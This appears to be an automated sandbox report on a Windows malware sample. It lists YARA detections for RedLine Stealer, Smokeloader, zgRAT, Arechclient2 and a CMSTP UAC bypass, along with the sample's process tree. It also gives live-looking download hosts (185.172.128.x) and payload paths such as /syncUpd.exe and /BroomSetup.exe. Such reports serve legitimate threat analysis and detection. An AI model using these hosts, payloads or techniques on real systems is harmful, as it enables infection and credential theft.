                            Source: 5.2.UniversalInstaller.exe.34ec86d.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 21.2.cmd.exe.4dca976.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.UniversalInstaller.exe.373b15b.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 7.2.cmd.exe.53ab264.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 5.2.UniversalInstaller.exe.3530d5b.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 21.2.cmd.exe.4e0ee64.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.UniversalInstaller.exe.373bd5b.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 5.2.UniversalInstaller.exe.353015b.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 21.2.cmd.exe.4e0e264.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.UniversalInstaller.exe.36f786d.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 6.2.UniversalInstaller.exe.3bbed5b.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 7.2.cmd.exe.5367976.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 7.2.cmd.exe.53abe64.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 6.2.UniversalInstaller.exe.3b7a86d.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: 00000002.00000002.2435628438.00000000043ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@26/78@5/7
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C7A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6C7A7030
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042EE29E CreateToolhelp32Snapshot,Module32First,0_2_042EE29E
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeMutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeMutant created: \Sessions\1\BaseNamedObjects\Global\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5148
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6300
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeMutant created: \Sessions\1\BaseNamedObjects\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile created: C:\Users\user\AppData\Local\Temp\u3z0.0.exeJump to behavior
                            Source: Yara matchFile source: 9.0.u3z0.1.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.2263644143.0000000006B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000000.2257557220.0000000000401000.00000020.00000001.01000000.00000012.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u3z0.1.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: one0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: one0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: two0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: two0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: three0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: three0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: four0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: four0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: five0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: five0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: six0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: six0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: seven0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: seven0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: eight0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: eight0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: nine0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: nine0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: ten0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: ten0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: one0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: two0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: three0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: four0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: five0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: six0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: seven0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: eight0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: nine0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: ten0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.900_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.900_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.900_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Installed0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Installed0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.590_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.590_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /syncUpd.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /syncUpd.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.590_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /syncUpd.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /1/Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /1/Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /1/Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Qg_Appv5.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /BroomSetup.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /BroomSetup.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /BroomSetup.exe0_2_00424B3E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: @0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: one0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: one0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: two0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: two0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: five0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: five0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: seven0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: seven0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: eight0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: eight0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: nine0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: nine0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: ten0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: ten0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.900_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.900_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.900_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Installed0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Installed0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.590_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.590_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /syncUpd.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /syncUpd.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.590_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /syncUpd.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /1/Qg_Appv5.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /1/Qg_Appv5.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /1/Qg_Appv5.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Qg_Appv5.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: Qg_Appv5.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /BroomSetup.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /BroomSetup.exe0_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: 185.172.128.2280_2_04224DA5
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCommand line argument: /BroomSetup.exe0_2_04224DA5
                            Source: 4BfhCycV4B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                            Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                            Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                            Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                            Source: u3z0.0.exe, u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                            Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                            Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                            Source: u3z0.0.exe, 00000002.00000003.2123311987.000000002484E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                            Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                            Source: 4BfhCycV4B.exeVirustotal: Detection: 39%
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile read: C:\Users\user\Desktop\4BfhCycV4B.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\4BfhCycV4B.exe "C:\Users\user\Desktop\4BfhCycV4B.exe"
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\u3z0.0.exe "C:\Users\user\AppData\Local\Temp\u3z0.0.exe"
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\u3z0.1.exe "C:\Users\user\AppData\Local\Temp\u3z0.1.exe"
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1124
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 2188
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
